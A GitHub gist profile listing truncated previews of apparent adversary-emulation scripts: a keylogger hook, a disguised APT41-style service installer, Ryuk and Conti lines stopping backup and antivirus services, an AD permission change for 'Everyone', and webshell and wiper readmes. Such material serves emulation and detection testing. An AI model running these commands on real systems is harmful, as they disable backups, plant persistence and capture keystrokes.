Skip to content

Instantly share code, notes, and snippets.

View 2XXE-SRA's full-sized avatar

2XXE (SRA) 2XXE-SRA

5 followers · 0 following
View GitHub Profile
@2XXE-SRA
2XXE-SRA / enum.sh
Created August 16, 2022 20:19
linux enum.sh
#!/bin/bash
df -aH
ip addr
netstat -tulpn
ps -aux
who -a
systemctl list-units --type=service --no-pager
service --status-all
apt list --installed
@2XXE-SRA
2XXE-SRA / dockerssm.py
Created August 4, 2022 19:17
Docker daemon via SSM session port forward
import json
import docker
import os
import boto3
import subprocess
TARGET_INSTANCE = "<instance ID>"
LOCAL_PORT = "9999"
REGION = "us-east-1"
PROFILE = "default"
@2XXE-SRA
2XXE-SRA / removeace.ps1
Last active June 29, 2022 19:51
Example removal of an ACE via PowerShell ADSI
# get SID for "Everyone" principal
$sid = [Security.Principal.securityidentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$everyone = $sid.Translate([security.principal.ntaccount])
# change user password permissions
$adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$pguid = new-object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb
# craft an ACE that grants "Everyone" "Allow" for changing user password
$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None"
@2XXE-SRA
2XXE-SRA / keylog.cs
Created June 14, 2022 20:22
Local Collection resources
using System;
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
class InterceptKeys
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
@2XXE-SRA
2XXE-SRA / install.bat
Created April 26, 2022 13:49
APT41 service creation via registry (source: https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits)
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
@2XXE-SRA
2XXE-SRA / kill.bat
Created April 15, 2022 19:26
ryuk kill.bat from https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
net1 stop samss /y
net1 stop veeamcatalogsvc /y
net1 stop veeamcloudsvc /y
net1 stop veeamdeploysvc /y
net.exe stop samss /y
net.exe stop veeamcatalogsvc /y
net.exe stop veeamcloudsvc /y
net.exe stop veeamdeploysvc /y
taskkill.exe /IM sqlbrowser.exe /F
taskkill.exe /IM sqlceip.exe /F
@2XXE-SRA
2XXE-SRA / php_cmd.py
Last active March 17, 2022 18:09
Behinder webshell clients
# Behinder Webshell Clients
## php_cmd.py
Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar.
@2XXE-SRA
2XXE-SRA / README.md
Last active February 1, 2022 19:07
File wiper (and other resources) based on DEV-0586 (MSTIC)

Usage

.\wipe <directory>

will rewrite all files in a directory recursively

@2XXE-SRA
2XXE-SRA / netstop.bat
Last active January 11, 2022 15:41
Conti net stop commands from: https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html
net stop "Acronis VSS Provider" /y 
net stop "Enterprise Client Service" /y 
net stop "SQLsafe Backup Service" /y 
net stop "SQLsafe Filter Service" /y 
net stop "Veeam Backup Catalog Data Service" /y 
net stop AcronisAgent /y 
net stop AcrSch2Svc /y 
net stop Antivirus /y 
net stop ARSM /y 
net stop BackupExecAgentAccelerator /y 
@2XXE-SRA
2XXE-SRA / cmd.bat
Last active September 27, 2021 20:07
Batch script to mimic a minimal cmd window
@echo off
setlocal enabledelayedexpansion
set "true=1"
:loop
if defined true (
set /p c="%cd%> "
start !c!
set c=